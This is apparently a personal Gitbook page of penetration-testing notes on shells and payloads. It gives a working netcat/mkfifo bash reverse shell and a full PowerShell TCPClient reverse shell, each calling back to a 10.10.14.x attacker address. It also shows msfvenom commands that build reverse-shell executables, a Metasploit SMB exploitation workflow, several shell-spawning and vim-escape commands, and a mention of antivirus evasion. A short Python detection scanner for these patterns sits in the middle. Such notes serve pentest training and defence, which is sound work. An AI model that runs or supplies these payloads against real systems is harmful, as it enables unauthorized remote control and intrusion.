Noirchapeau's Gitbook

Shells & Payloads: Payloads Overview

Payloads Overview

Types of Payloads

  • Staged Payloads

    • Sends a small initial stage first, which then downloads the main payload

    • Better for environments with sufficient memory

    • Example naming: windows/meterpreter/reverse_tcp (slash between meterpreter and reverse_tcp)

  • Stageless Payloads

    • The entire payload is sent at once

    • Ideal for low-bandwidth environments

    • Example naming: windows/meterpreter_reverse_tcp (underscore instead of slash)

Essential Payload Commands

Netcat/Bash Reverse Shell

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f

PowerShell Reverse Shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close()"

MSFvenom Payload Generation

  • List Available Payloads

    msfvenom -l payloads
  • Linux Payload Creation

    msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f elf > payload.elf
  • Windows Payload Creation

    msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe

Windows System Infiltration

Fingerprinting Windows Hosts

  • TTL Check via Ping

    ping <target_ip>    # Windows hosts typically reply with TTL=128 (32 on very old versions); Linux hosts typically 64
  • Nmap OS Detection

    sudo nmap -v -O <target_ip>
    sudo nmap -v -A <target_ip>    # Aggressive scan

Key Windows Ports

  • 139, 445: NetBIOS/SMB

  • 135: MSRPC

  • 443: HTTPS

Common Windows Payloads

  1. DLLs: For privilege escalation and UAC bypass

  2. Batch Files (.bat): Automation scripts

  3. VBScript (.vbs): Client-side automation

  4. MSI Files: Installation packages

  5. PowerShell Scripts: System automation and exploitation

Metasploit Attack Workflow

# Start Metasploit
sudo msfconsole

# Search for exploit
search smb

# Configure exploit
use <exploit_number>
set RHOSTS <target_ip>
set SHARE ADMIN$
set SMBPass <password>
set SMBUser <username>
set LHOST <attacker_ip>

# Execute
exploit

Linux System Infiltration

Pre-Exploitation Checklist

Interactive Shell Spawning Methods

  • Python TTY Shell

    python -c 'import pty; pty.spawn("/bin/sh")'
  • Basic Shell Spawning

    /bin/sh -i
    perl -e 'exec "/bin/sh";'
    ruby -e 'exec "/bin/sh";'
    lua -e 'os.execute("/bin/sh")'
    awk 'BEGIN {system("/bin/sh")}'
  • VIM Shell Escape

    vim -c ':!/bin/sh'
    # Or in VIM:
    :set shell=/bin/sh
    :shell
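From the defender's side, the reverse-shell one-liners under Essential Payload Commands and the shell-spawning commands above all leave recognisable strings in process-execution telemetry. The following is an added example, not part of the original notes: a small Python scanner that parses constructed command-line log records (the `host=... user=... cmd=...` format and the sample events are assumptions for illustration) and flags the patterns this page lists.

```python
import re

# Constructed sample process-execution records (not real telemetry).
SAMPLE_EVENTS = [
    "host=web01 user=www-data cmd=rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | "
    "/bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f",
    ("host=ws07 user=alice cmd=powershell -nop -c \"$client = New-Object "
     "System.Net.Sockets.TCPClient('10.10.14.158',443); "
     "$sendback = (iex $data 2>&1 | Out-String)\""),
    "host=web01 user=www-data cmd=python -c 'import pty; pty.spawn(\"/bin/sh\")'",
    "host=db02 user=postgres cmd=perl -e 'exec \"/bin/sh\";'",
    "host=db02 user=postgres cmd=vim -c ':!/bin/sh'",
    "host=web01 user=root cmd=ls -la /var/www",
    "host=build1 user=ci cmd=python -c 'import json; print(json.dumps({}))'",
]

# Each rule is (name, regex over the command line). Heuristic string matches only.
RULES = [
    # named pipe feeding a shell whose output is piped to netcat
    ("fifo_netcat_reverse_shell", re.compile(r"mkfifo\s+\S+.*\|\s*nc\b", re.I)),
    # raw TCPClient socket combined with Invoke-Expression of received data
    ("powershell_tcpclient_iex", re.compile(r"TCPClient\(.*\biex\b", re.I)),
    # Python pty upgrade of a dumb shell
    ("python_pty_spawn", re.compile(r"pty\.spawn\(", re.I)),
    # perl/ruby/lua/awk one-liners that exec a shell
    ("interpreter_exec_shell", re.compile(
        r"\b(?:perl|ruby|lua|awk)\b.*(?:exec|os\.execute|system)\(?\s*['\"]/bin/(?:ba)?sh", re.I)),
    # vi/vim shell escape via :! or by changing the shell option
    ("editor_shell_escape", re.compile(r"\bvim?\b.*(?::!|set\s+shell=)", re.I)),
]

def parse_event(line):
    """Split one record into host, user and raw command line; None if malformed."""
    m = re.match(r"host=(\S+)\s+user=(\S+)\s+cmd=(.*)$", line)
    if not m:
        return None
    return {"host": m.group(1), "user": m.group(2), "cmd": m.group(3)}

def match_rules(cmd):
    """Return the names of every rule whose pattern occurs in the command line."""
    return [name for name, rx in RULES if rx.search(cmd)]

def scan_events(lines):
    """Return (host, user, [rule names]) for each record that triggers a rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        hits = match_rules(ev["cmd"])
        if hits:
            findings.append((ev["host"], ev["user"], hits))
    return findings

if __name__ == "__main__":
    for host, user, hits in scan_events(SAMPLE_EVENTS):
        print(f"{host} {user}: {', '.join(hits)}")
```

These are plain-text heuristics: encoded or obfuscated command lines will not match, so they belong alongside egress monitoring for unexpected outbound connections from interpreters and shells rather than in place of it.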

Permission Checks

# File permissions
ls -la <path/to/file>

# Sudo permissions
sudo -l

Best Practices

Pre-Exploitation

  • Always perform thorough reconnaissance

  • Document all findings and attempted exploits

  • Verify target scope and permissions

Post-Exploitation

  • Maintain access securely

  • Document all changes made to the system

  • Clean up after testing is complete

Security Considerations

  • Use staged payloads for better reliability

  • Consider antivirus evasion techniques

  • Always use secure channels for communication
